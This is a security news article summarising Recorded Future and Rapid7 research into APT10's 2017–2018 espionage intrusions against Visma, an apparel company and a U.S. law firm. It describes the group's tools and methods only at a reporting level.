China-linked cyber-espionage group APT10 has targeted companies in the United States and Europe to steal intellectual property or gain commercial advantage, Recorded Future security researchers say.
The attacks, observed between November 2017 and September 2018, hit at least three companies, namely Norwegian IT and business managed service provider (MSP) Visma, an international apparel company, and a U.S. law firm with strong experience in intellectual property law.
The Chinese hackers used Citrix and LogMeIn remote-access software and stolen valid user credentials to access the networks of targeted companies. For privilege escalation, DLL sideloading techniques previously associated with APT10 were used.
Malware deployed in the attacks include Trochilus, which was used in the Visma incident, and a unique version of the UPPERCUT (ANEL) backdoor, used in the other two incidents. Mimikatz was also used for credential harvesting.
The malicious software too was previously associated with the cyber-spies. Other APT10 Tactics, Techniques and Procedures (TTPs) observed in these attacks include the use of BITSAdmin-scheduled tasks to transfer tools from the command and control (C&C) server.
During the assaults on Visma and the apparel company, data was exfiltrated to a Dropbox account. Dropbox was used in the attack on the U.S. law firm as well, with the cURL for Windows command-line tool being employed for data exfiltration (the same as in the Visma incident).
“We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date. On top of the breadth, volume, and targets of attacks that APT10 has conducted since at least 2016, we now know that these operations are being run by the Chinese intelligence agency, the Ministry of State Security (MSS),” Recorded Future notes.
Also known as menuPass, Stone Panda, and CVNX, and tracked since 2009, APT10 has historically focused on Japanese entities, but expanded its target list in 2017, when it hit entities in at least fourteen countries, including the website of a prominent U.S. trade association.
In December last year, the United States, United Kingdom, Canada, Australia, New Zealand and Japan officially blamed APT10 for a series of cyberattacks launched against organizations around the world. The U.S. has also indicted two alleged hackers believed to be part of APT10.
In April 2017, PwC UK and BAE Systems published a report on Operation Cloud Hopper, a massive campaign in which the Chinese hackers targeted managed IT service providers and their clients. Similarly, the attack on Visma was likely aimed at “enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property,” Recorded Future says.
The attacks on the U.S. law firm (which has clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others) and the international apparel company, however, were likely meant to gather information for commercial advantage.
The modified version of Trochilus malware used in this campaign had its C&C communications encrypted using a combination of RC4 and Salsa20 stream ciphers, unlike previously observed iterations, which only used RC4, the researchers say.
A Rapid7 investigation into the campaign revealed that the U.S. law firm was targeted first, in late 2017, followed by the apparel company a few months later, and Visma in August 2018. All three attacks involved the targeting of Citrix remote desktops and the use of the same DLL sideloading technique.
During the investigation, the researchers learned that portions of what is now referred to as APT10 will be recategorized as a new group, but they say there isn’t sufficient data at this time to make that distinction.
“This campaign brings to light further evidence supporting the assertions made by the Five Eyes nations, led by the U.S. Department of Justice indictment against APT10 actors outlining the unprecedented scale of economic cyberespionage being conducted by the Chinese Ministry of State Security. Crucially, the variety of businesses targeted prove that these campaigns are being conducted against corporations across the commercial spectrum, aimed at undermining international norms in trade to erode the competitive advantage of companies that have invested heavily in patented technology,” Recoded Future concludes.